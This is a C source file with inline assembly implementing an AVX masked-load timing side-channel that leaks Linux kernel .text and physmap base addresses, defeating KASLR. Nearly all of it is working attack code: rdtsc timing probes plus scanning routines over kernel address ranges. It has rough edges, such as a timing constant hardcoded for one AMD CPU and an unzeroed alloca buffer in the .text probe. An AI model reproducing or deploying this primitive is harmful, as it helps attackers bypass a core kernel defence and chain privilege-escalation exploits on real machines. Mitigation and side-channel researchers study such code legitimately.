/*
    AVX timing side-channel to break .text and physmap KASLR on PML4 Linux
    Author: zolutal
*/

#define _GNU_SOURCE
#include <x86intrin.h>
#include <inttypes.h>
#include <memory.h>
#include <unistd.h>
#include <sched.h>
#include <fcntl.h>

// --------- MACRO HELL START -----------

#define ASM_INTEL(asm_code) \
    __asm__ ( \
        ".intel_syntax noprefix;" \
        asm_code \
        ".att_syntax prefix;" \
    )

#define ASM_INTEL_VOLATILE(asm_code, outputs, inputs, clobbers) \
    __asm__ __volatile__ ( \
        ".intel_syntax noprefix;" \
        asm_code \
        ".att_syntax prefix;" \
        : outputs \
        : inputs \
        : clobbers \
    )

#define ASM_FUNC(func_name, instructions) \
    ASM_INTEL ( \
       ".section .text;" \
       ".global " #func_name ";" \
       ".type " #func_name ", @function;" \
       #func_name ":" \
       instructions \
    );

// ---------- MACRO HELL END ------------

void maccess(void *addr);
ASM_FUNC(maccess,
    "mov rax, [rdi];"
    "ret;"
);


void clflush(void *addr);
ASM_FUNC(clflush,
    "clflush [rdi];"
    "mfence;"
    "ret;"
);

uint64_t time_probe(void *addr);
ASM_FUNC(time_probe,
    "push rbx;"
    "push rdx;"
    "mfence;"

        "rdtsc;"
        "shl rdx, 32;"
        "or rdx, rax;"
        "mov rbx, rdx;"

        "mov rax, [rdi];"
        "lfence;"

        "rdtsc;"
        "shl rdx, 32;"
        "or rdx, rax;"
        "lfence;"

    "sub rdx, rbx;"
    "mov rax, rdx;"

    "pop rdx;"
    "pop rbx;"
    "ret;"
);

uint64_t time_flush(void *addr);
ASM_FUNC(time_flush,
    "push rbx;"
    "push rdx;"
    "lfence;"

        "rdtsc;"
        "shl rdx, 32;"
        "or rdx, rax;"
        "mov rbx, rdx;"

        "clflush [rdi];"
        "lfence;"

        "rdtsc;"
        "shl rdx, 32;"
        "or rdx, rax;"
        "lfence;"

    "sub rdx, rbx;"
    "mov rax, rdx;"

    "pop rdx;"
    "pop rbx;"
    "ret;"
);

uint64_t time_masked_avx(void *addr);
ASM_FUNC(time_masked_avx,
    "push rbp;" // for 16 byte alignment
    "push rbx;"
    "push rdx;"

    "sub rsp, 32;"
    "movdqa [rsp], xmm0;"
    "movdqa [rsp + 16], xmm2;"

    "movaps xmm2, xmm0;"
    "xorps xmm2, xmm2;"
    "lfence;"

        "rdtsc;"
        "shl rdx, 32;"
        "or rdx, rax;"
        "mov rbx, rdx;"

        "vmaskmovps xmm1, xmm2, [rdi];"
        "lfence;"

        "rdtsc;"
        "shl rdx, 32;"
        "or rdx, rax;"

    "sub rdx, rbx;"
    "mov rax, rdx;"

    "movdqa xmm0, [rsp];"
    "movdqa xmm2, [rsp + 16];"
    "add rsp, 32;"

    "pop rdx;"
    "pop rbx;"
    "pop rbp;"
    "ret;"
);

uint64_t probe_ktext(uint64_t offset)
{
    const uint64_t kernel_lower_bound = 0xffffffff80000000;
    const uint64_t kernel_upper_bound = 0xffffffffc0000000;
    const uint64_t step = 0x100000;
    const int dummy_iterations = 5;
    const int iterations = 100;
    const int arr_size = (kernel_upper_bound - kernel_lower_bound) / step;

    uint64_t scan_start = kernel_lower_bound;

    uint64_t *data = (uint64_t *)alloca(arr_size * sizeof(uint64_t));
    uint64_t min = ~0, addr = ~0;

    for (int i = 0; i < iterations + dummy_iterations; i++) {
        for (uint64_t idx = 0; idx < arr_size; idx++)
        {
            uint64_t test = scan_start + idx * step;
            syscall(104);
            uint64_t time = time_masked_avx((void *)test);
            if (i >= dummy_iterations)
                data[idx] += time;
        }
    }

    for (int i = 0; i < arr_size; i++) {
        data[i] /= iterations;
        if (data[i] < min)
        {
            min = data[i];
            addr = scan_start + i * step;
        }
    }
    return addr - offset;
}

uint64_t probe_phys(uint64_t offset)
{
    const uint64_t phys_lower_bound = 0xffff887f00000000;
    const uint64_t phys_upper_bound = 0xffffa10000000000;
    const uint64_t step = 0x40000000;
    const int dummy_iterations = 20;
    const int iterations = 200;
    const int arr_size = (phys_upper_bound - phys_lower_bound) / step;

    uint64_t scan_start = phys_lower_bound;

    uint64_t *data = (uint64_t *)malloc(arr_size * sizeof(uint64_t));
    memset(data, 0, arr_size * sizeof(uint64_t));

    uint64_t min = ~0, addr = ~0;

    for (int i = 0; i < iterations + dummy_iterations; i++) {
        for (uint64_t idx = 0; idx < arr_size; idx++)
        {
            uint64_t test = scan_start + idx * step;
            syscall(104);
            uint64_t time = time_masked_avx((void *)test);

            // 0xbd works for an AMD Ryzen 7 PRO 6850U
            // TODO: how do we make this more generic...
            if (i >= dummy_iterations && time != 0xbd) {
                // the value here really should not matter, and yet...
                data[idx] += 0x200;
            }
        }
    }

    for (int i = 0; i < arr_size; i++) {
        data[i] /= iterations;
        if (data[i] < min)
        {
            min = data[i];
            addr = scan_start + i * step;
        }
    }
    free(data);
    return addr - offset;
}
